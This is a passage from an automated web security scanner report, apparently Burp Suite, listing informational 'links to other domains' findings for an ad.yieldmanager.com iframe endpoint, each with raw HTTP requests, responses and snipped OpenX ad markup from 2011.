User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:52 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0276.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:26:52 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601611_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTdFqgzAU.RrfJJjEporsITYryBq3glTsi9gknV2r6WJGxa9fNkt.oJfLvecczj0X4iSWBDUSkhAfyEJJlECMxBJJiIjwgyRJMIziJcKYhP6QpZIyGGR0VQqypf.FYvY2IzdZRLfZzD4iCm4MgFAbfpulbx4
...[SNIP]...
-82HXv5evI7znu.sX3W2uvHqYeWruWwJpGqhHoq-pHIHTnxOZowLV1prVRR6OG1sMsDDxEJt2rk3SMLOAfFweHT.2gjK1N00vd1f1Pd1CmbpVRznDRwjl-AdDgc3s=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601611_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601611_HERE" border="0" alt=""></a>
...[SNIP]...
19.49. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4H0cmceDRCl08ukGmnLzek.uwxNTiQ88Jp76AAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2651593533%26r%3D0%26s%3D2126909,32b859ac-ed53-11e0-afb3-78e7d1f5d952,1317600241012 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:01 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0410.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:04:01 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600241_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTUFugzAQfA03ZGEMwQj1YGIhocZtI9EiuCCwTUgImBqqpHl93RLlA12tdmdGs7MQRa2PhAgbFMqwbblbRxC5PIDYxTKwnSiKXN9BPg6wH9hzGgtCoZOSbc43e.JXNKTPKzKTYrJPV.aGCbhQADyl2WWVPhl
...[SNIP]...
mJnuUFLGkP2T3H3D.Zdrcsk4WI5SamBVh0LeQVqEmOV8DVYMS61WDqjCnRstVy7ixEPcdyNzc1yqMwbOPDX84bg4.jLPVS6XoUaqjGr6GRuuqklsZwVtw4fgCRM3Pk,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600241_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600241_HERE" border="0" alt=""></a>
...[SNIP]...
19.50. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAm1vWpI-TRCsuoYdgrioJAYGoEVxN-bS77xGhUAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1870056116%26r%3D0%26s%3D2126909,66d40c8e-ed55-11e0-a7d1-78e7d1629176,1317601187428 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:55 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0388.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:19:55 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601187_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljN1qg0AQhZ.GO1n2x1-kF5qNYBttBdOiN6LuWkPUtatFm6fvUkNeoMMw853hzEHEs2sXmxjbreugyiWuhwhubGzVhgF16HkehtA0HYIg0ucoYD5FMPIPx8ZK.b-iLn3ZSU3q-KnY1Zvjg5UCYAgZr.vpK3b
...[SNIP]...
aNs.znNTuS5J6j.p90vVuWSSO-hkPVDCyyYnwDYuLjBhoxqGPVSjB1yhRK3ko-dxqhBtSwdRMjvzClLBO6Sje14ss4c7mUshqZGMrxe6i5LDsuuTL0olGOX97McuM=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601187_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601187_HERE" border="0" alt=""></a>
...[SNIP]...
19.51. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHd0gv9eXRCrfzkpgA5P8j5gotMdchY3NIk9mJAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D261681624%26r%3D0%26s%3D2126909,7c72be5e-ed56-11e0-a9f4-78e7d1623288,1317601653197 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:27:41 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0043.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:27:41 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601653_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTUFugzAQfA03ZNngEBDqwcRFog1JI6EgckFgm0IDmBqqUF5fp1T5QFer3ZnR7CyyfVbZhQersoS4YmzDfWRbbGtxDktuQt.3LceztsiF2DHHKOCEIhiRXcqcE.kt6tHXFelJXXKKVvbmEnCjAGCp4tsqfcY
...[SNIP]...
eEX-Mk-46XCB8fh-TJNOtpGgybGFaom4NJFVzMQA6inwGTnRaLSoGh1qZQiUqJsTZsiqFhOYvsRcM1czbozlmpcdOPQk25Knouu7z.6kqh8loooQ2tZNrxA7a6dNo=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601653_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601653_HERE" border="0" alt=""></a>
...[SNIP]...
19.52. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnLkBtht7RCkX5FXii8NawCQH2MmvZt5xbq4QtAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D316372535%26r%3D0%26s%3D2126909,0e4bfcc8-ed52-11e0-a0a4-78e7d162d8bc,1317599750407 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:55:51 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0125.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:55:51 GMT
Pragma: no-cache
Content-Length: 1842
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599750_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGlTstqwzAQ.BrfjJBk1XExPUhVHdxEoQGT4lyCLSmV8UOO4pI0X19Rh.xAl2V3ZpgdFkWpxFDhWmJNIJQ6WaQownKBYFUfcQjTNCWQYIyiJELhOWeKcgRzylar05b-FX.mqxn5yRO6LWf2kVBw4QAQ68Rllk4
...[SNIP]...
Uk-0K1oih.9tw05f1Pf.8ShmaaxiCiAc58KzC5SukrsKMerkDa3ovV0YHReFPm9NHpswkiTmCA45sddKM8i58Q8lzWHjfDWbvp4KpB2f4wfPe1dgejnfaGzkrv-AX3E3NG,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599750_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599750_HERE" border="0" alt=""></a>
...[SNIP]...
19.53. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC3BwX1pebRCn9YKzdn4BkeZnsrcIs5FyeUJMrtAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1608542378%26r%3D0%26s%3D2126909,e57cad56-ed56-11e0-8c24-78e7d15f0cfc,1317601829423 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:05 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0061.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:05 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601829_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlTl2LgzAQ.DW-SUjiZ5B7iM1Z5FSuYHvYF7ExnqXVeNFD8ddfOEv.QJdld2aYHRZZgdd4FhICQcRd0hA3QBbmngVFwx0TBkGAHGh7BHnEMcc4rClDMKa7d-4e6H8xwj42pCfz6UFu7NOnYGYA2FKl8yb9pD5
...[SNIP]...
3NT126z7ri8ae-fzPNdpoGw6IGjnTXYFJVLRYgB9EvgMtOi1WjwNBqU6REo8TYGhazoYHdVfbiWmvmOpBozi8aX.tRqKlUVV.Lrux.u4tQZSuU0Ia75NrxB4X7cuk=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601829_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601829_HERE" border="0" alt=""></a>
...[SNIP]...
19.54. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8xGO1lebRCgJvY9zXp10IPjocW-Oh.0gS6.ODAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1821794066%26r%3D0%26s%3D2126909,dc2c43b0-ed56-11e0-a95e-b3e2f14be636,1317601813797 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:01 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0192.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:01 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601813_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyMI2rwj1YIKoSOO0Sd2g5IJ4mEILmBoqEF9ft0T5ga5WuzOj2VmIPeRgVJbQwmaWWWXGPYhR7mCj4KmtG57nIezY0LY2WB8ivyABNCKyjXP7SP4q2ARPK1IzcMkxWtmLS8AUAGAKSadV-qK
...[SNIP]...
J2qq.sshxuOer-Qdercew1TDQUqi7AKNOCz0D0vJtBLlolpqUEfaVMoeSl5EOl4cA0NGQvouN1oZhtwV-eZwrX3cDlmMi0K0SbdN9txmVSccmVoRG5cvwAI8Vz1g==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601813_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601813_HERE" border="0" alt=""></a>
...[SNIP]...
19.55. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4w82H6uHRCo7JLLmhTqd5xXylM4QZmNQ1tg-tAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3251699019%26r%3D0%26s%3D2126909,13b5908c-ed54-11e0-8964-78e7d1f5c9f4,1317600618481 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:53 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0160.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:10:53 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600618_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTV1rhDAQ.DW-SUjU-IH0IV4qSM9rBVuxL-Ilsd6dGhstJ.76prX4B7osuzPD7CyyQ-TVsEFMuMziAfJwiGyLeUi4jR2YMAxDK4AYew62fXNKIk4oggk5FMzNyG.RgD5tSE.qkyzZ2ItPwJ0C4EiV3jfpM.X
...[SNIP]...
e3tChRuXb9aT8kD6bZzvNo2MSwYt0czKrmYgFyFMMCmOy1WDcKjK02xUo0SkytYVMHGpa7ykFcuGYuRj-cnTW-DJNQc6Xqgcu-Gr76s1BVK5TQhk4y7fgGvNhzNg==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600618_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

